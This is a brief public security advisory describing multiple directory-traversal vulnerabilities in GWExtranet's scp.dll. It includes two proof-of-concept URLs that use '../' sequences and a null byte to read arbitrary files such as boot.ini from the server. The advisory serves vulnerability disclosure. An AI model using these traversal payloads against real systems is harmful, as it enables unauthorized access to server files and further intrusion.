8 lines
No EOL
760 B
Text
8 lines
No EOL
760 B
Text
source: http://www.securityfocus.com/bid/26525/info
|
|
|
|
GWExtranet is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks.
|
|
|
|
http://www.example.com/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00
|
|
http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll |